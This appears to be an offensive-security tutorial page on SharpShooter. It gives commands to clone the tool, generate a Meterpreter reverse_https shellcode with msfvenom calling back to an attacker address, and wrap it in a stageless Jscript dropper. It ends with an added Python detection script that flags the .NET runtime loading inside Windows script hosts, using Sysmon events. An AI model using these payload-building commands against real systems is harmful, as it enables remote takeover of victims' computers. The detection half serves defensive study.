Jscript

SharpShooter

In recent years, it has become much more common to use DotNetToJscript to weaponize C# compiled assemblies in other file formats (like Jscript, VBScript, and even Microsoft Office macros). A payload generation tool called SharpShooter has been created to assist with this.

1. Download SharpShooter

sudo git clone https://github.com/mdsecactivebreach/SharpShooter
cd SharpShooter
sudo pip install -r requirements.txt

2. Generate Shellcode

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o /var/www/html/shell.txt

3. Invoke SharpShooter

python SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /var/www/html/shell.txt --output test

--payload js specifies a Jscript output format. The next parameter, --dotnetver, sets the .NET Framework version to target. The --stageless parameter specifies in-memory execution of the Meterpreter shellcode. In SharpShooter, the term stageless refers to whether the entire Jscript payload is transferred at once or HTML smuggling is used with a staged Jscript payload. --rawscfile specifies the file containing our shellcode, and --output sets the output file name, leaving off the file extension.

4. Setup A Listener

Manual

Who wants to do this manually...
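From the detection side, a DotNetToJscript-style script runs its .NET assembly inside the script host, so the CLR gets loaded into wscript.exe or cscript.exe. The following added example (not part of the original page or of SharpShooter) flags that pattern in Sysmon process-create (Event ID 1) and image-load (Event ID 7) records; the flat JSON-lines layout, the sample events and the function names are assumptions constructed for the illustration.

```python
import json
from pathlib import PureWindowsPath

# Script hosts that do not normally host the .NET runtime.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Core CLR modules; loading them means managed code is starting in-process.
CLR_MODULES = {"mscoree.dll", "mscoreei.dll", "clr.dll", "clrjit.dll"}

def _name(path):  # lower-cased file name of a Windows path, on any OS
    return PureWindowsPath(path or "").name.lower()

def find_clr_in_script_hosts(lines):
    """Return one finding per script-host process that loaded CLR modules."""
    cmdlines, hits = {}, {}
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue                      # truncated or non-JSON line
        if not isinstance(ev, dict) or not ev.get("ProcessGuid"):
            continue
        guid = ev["ProcessGuid"]
        if ev.get("EventID") == 1:        # Sysmon process creation
            cmdlines[guid] = ev.get("CommandLine", "")
        elif (ev.get("EventID") == 7      # Sysmon image load
              and _name(ev.get("Image")) in SCRIPT_HOSTS
              and _name(ev.get("ImageLoaded")) in CLR_MODULES):
            hit = hits.setdefault(guid, {"image": ev["Image"], "modules": set()})
            hit["modules"].add(_name(ev["ImageLoaded"]))
    # Command lines are resolved last, so event order does not matter.
    return [{"guid": g, "image": h["image"], "modules": sorted(h["modules"]),
             "command_line": cmdlines.get(g, "<no process-create event>")}
            for g, h in hits.items()]

# Constructed sample events (not real telemetry).
WSCRIPT = r"C:\Windows\System32\wscript.exe"
CLR = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
SAMPLE = [json.dumps(e) for e in (
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": WSCRIPT,
     "CommandLine": r"wscript.exe C:\Users\demo\Downloads\test.js"},
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": WSCRIPT,
     "ImageLoaded": r"C:\Windows\System32\mscoree.dll"},
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": WSCRIPT, "ImageLoaded": CLR},
    {"EventID": 7, "ProcessGuid": "{B2}", "Image": WSCRIPT,
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    {"EventID": 7, "ProcessGuid": "{C3}", "ImageLoaded": CLR,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
)] + ['{"EventID": 7, "ProcessGuid"']   # truncated line is skipped

if __name__ == "__main__":
    print(*find_clr_in_script_hosts(SAMPLE), sep="\n")
```

Legitimate administration scripts that create .NET COM objects also load the CLR into a script host, so findings should be compared against a baseline of known scripts before alerting.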
